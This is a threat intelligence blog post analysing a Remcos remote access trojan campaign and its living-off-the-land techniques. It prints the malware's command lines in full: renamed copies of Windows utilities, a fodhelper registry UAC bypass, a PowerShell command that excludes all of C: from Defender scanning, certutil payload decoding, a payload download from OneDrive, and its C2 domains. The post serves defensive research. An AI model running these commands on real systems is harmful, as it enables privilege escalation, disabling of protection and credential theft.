Hyas Blog | Revealing LOTL Techniques Used by an Active Remcos Malware Campaign
Weekly Threat Intelligence Report
Date: June 10, 2024
Prepared by: David Brunsdon, Threat Intelligence - Security Engineer, HYAS
This article continues the research found last week regarding an ongoing campaign using the Remcos remote access trojan. The attack appears to originate in Nigeria, and uses Lithuanian infrastructure. This week we’re looking deeper into the behavior of the malware to see what we can learn.
This article illustrates how the malware uses several “living off the land” techniques, where built-in operating system files are used to disguise malicious behavior. Using files inherent to Windows has the benefit of not requiring additional tools or malware, which could be blocked or detected as malicious, being added to the device.
In this research we examine:
- How the malware attempts to hide its actions from EDR by replicating windows files using extrac32.exe.
- How the malware attempts to bypass User Account Control (UAC).
- How it decodes and downloads an additional payload from OneDrive to steal credentials.
At HYAS we are constantly detonating malware, from which collect all sorts of telemetry such as external communications, file creations and modifications, registry changes, and other commands run in the environment. This data is used automatically in HYAS Protect to provide high efficacy protective DNS, and is also available for manual threat intelligence research in HYAS Insight threat intelligence platform.
Hiding cmd.exe usage
One of the first processes executed by the malware uses extrac32.exe, which is a tool included in Windows for extracting compressed files like .cab. The executable has a command line switch (/c) which instead copies the file to a new destination and filename. In the case of this malware, it’s taking cmd.exe, and making a file called alpha.exe.
C:\Windows\System32\extrac32 /C /Y C:\Windows\System32\cmd.exe "C:\Users\Public\alpha.exe"
Now that alpha.exe has been created it is used in place of cmd.exe, which should provide some benefits to avoiding detection for its usage.
Assembling the Tools
Using alpha.exe to execute further extrac32 processes, additional copies are made of several files used in living off the land techniques.
C:\Users\Public\alpha /c extrac32 /C /Y C:\Windows\System32\certutil.exe C:\Users\Public\kn.exe
Next is the creation of kn.exe from certutil.exe, which is a windows certificate utility that has many capabilities including encoding and decoding files, as well as downloading from the Internet.
Similarly, ger.exe is created from reg.exe, which allows editing of keys and values within the windows registry.
C:\Users\Public\alpha /c extrac32 /C /Y C:\Windows\System32\reg.exe "C:\Users\Public\ger.exe"
Later, xkn.exe was created to utilize powershell scripting.
C:\Users\Public\alpha /c extrac32 /C /Y
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Users\Public\xkn.exe"
And finally per.exe is copied from fodhelper.exe which can function as privilege escalation by providing a bypass to User Account Control (UAC).
C:\Users\Public\alpha /c extrac32 /C /Y C:\Windows\System32\fodhelper.exe "C:\Windows\System32\per.exe"
Living off the Land Tools Identified:
Each one of these windows executables plays a role in embedding the spyware into the victim machine.
Timeline
When the malware is detonated, the following sequence occurs:
1. C:\Users\Public\\alpha /c C:\Users\Public\kn -decodehex -F
"C:\Users\Admin\AppData\Local\Temp\PO767575.cmd"
"C:\Users\Public\Ping_c.mp4"
a. Certutil.exe is used to decode a file and create Ping_c.mp4, which eventually becomes Ping_c.pif, and acts as the payload and is also used to download additional files.
2. C:\Users\Public\alpha /c C:\Users\Public\xkn -WindowStyle hidden -Command "C:\Users\Public\alpha /c C:\Users\Public\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\Users\Public\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
a. Using powershell to launch reg.exe, a registry key is added and an additional nested powershell command placed there.
b. The registry key is utilized later by fodhelper.exe to bypass UAC.
c. The nested powershell script disables security by adding an exception to Microsoft Defender for the entire C:\
3. alpha /c taskkill /F /IM SystemSettings.exe
a. Using taskill on SystemSettings will likely disable some dialog/error boxes that could appear to the user.
4. C:\Windows\System32\per.exe
a. Fodhelper (per.exe) is executed with the registry key in place to initialize the UAC bypass. Fodhelper executes with elevated privileges and will automatically run a specific registry key in this context.
b. For more information on how the UAC bypass works, see this article: https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
5. After some additional use of certutil, Ping_c.mp4 becomes Ping_c.pif which is executed and initiates some network communications.
6. A file is downloaded from a onedrive.live.com url with a get request:
a. GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
b. Filename downloaded is: 233_Zlnehhbbwhz
6. The payload appears to contain a version of ChromePass.exe, a tool used to read and write to file the passwords stored within Chrome. (https://www.nirsoft.net/utils/chromepass.html)
With the stages of payloads installed encrypted communication with two c2 domains began.
a. taker202.ddns.net:3017
b. taker202.duckdns.org:5033
With C2 communication engaged, the threat actor now has Remcos (and potentially more) running on the victim device. They’re able to remotely control the device, view the camera, listen to the microphone, install applications, exfiltrate data, and more.
This analysis demonstrates how malware, and threat actors, will employ a variety of techniques to circumvent detections. To protect an organization, a robust, multi-level cybersecurity program should be in place to detect all the many techniques and tactics that can be used by malware, or simply threat actors with ‘hands on the keyboard’.
Malware Mystery
A question to my esteemed colleagues and peers: As I was conducting this research, I discovered something that I couldn’t explain. Within the malware processes was the creation and deletion of critical windows folders. These folders would already exist on a windows PC so they couldn’t be created, and although the actions appear destructive, surely an ‘Access Denied’ error would occur upon the deletion attempt.
Early in malware process tree
C:\Users\Public\alpha /c mkdir "C:\Windows "
C:\Users\Public\alpha /c mkdir "C:\Windows \System32"
End of malware process tree
C:\Users\Public\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha /c rmdir "C:\Windows \System32"
C:\Users\\Public\alpha /c rmdir "C:\Windows \"
At first glance it looks extremely destructive. But we know that you can’t delete Windows while running Windows, right? As far as I can tell a) that doesn’t make sense and b) it wouldn’t succeed. After all, it makes no sense to install spyware on a computer then destroy it. My best guess is that it must be deleting something in those folders, such as the contents of the logs directories. But what a crazy way to do it.
What do you think??
Read the previous report:
Threat Intel Report - June 3, 2024
Sign up for the free HYAS Insight Intel Feed
Disclaimer: This Threat Intelligence Report is provided “as is” and for informational purposes only. HYAS disclaims all warranties, express or implied, regarding the report’s completeness, accuracy, or reliability. You are solely responsible for exercising your own due diligence when accessing and using this Report's information. The analyses expressed in this Report reflect our current understanding of available information based on our independent research using the HYAS Insight platform. The Report’s inclusion of any companies, organizations, or ASNs does not imply any wrongdoing on their part; it is simply an indication of where digital threat activities have been observed. HYAS reserves the right to update the Report as additional information is made known to us.
Learn More About HYAS Insight
An efficient and expedient investigation is the best way to protect your enterprise. HYAS Insight provides threat and fraud response teams with unparalleled visibility into everything you need to know about the attack.This includes the origin, current infrastructure being used and any infrastructure.
Read how the HYAS Threat Intelligence team uncovered and mitigated a Russian-based cyber attack targeting financial organizations worldwide.
Learn how a solo intelligence analyst can navigate code obfuscation using generative AI. Using Generative AI to Understand How an Obfuscated Script Works
More from HYAS Labs
Using Generative AI to Understand How an Obfuscated Script Works
Polymorphic Malware Is No Longer Theoretical: BlackMamba PoC.
Polymporphic, Intelligent and Fully Autonomous Malware: EyeSpy PoC.